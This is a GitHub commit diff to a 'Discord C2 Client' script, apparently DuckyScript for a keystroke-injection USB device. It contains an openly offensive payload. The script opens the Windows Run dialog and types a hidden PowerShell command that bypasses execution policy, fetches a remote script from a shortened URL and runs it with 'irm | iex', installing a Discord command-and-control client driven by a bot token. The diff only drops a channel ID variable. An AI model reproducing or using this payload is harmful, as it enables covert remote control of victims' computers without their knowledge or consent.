Update Discord C2 Client.txt

This commit is contained in:
egieb
2024-12-11 21:51:24 +00:00
committed by GitHub
parent 22343cb2a5
commit 5a276d7d9a

View File

@@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
STRING powershell -NoP -Ep Bypass -W H -C $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
ENTER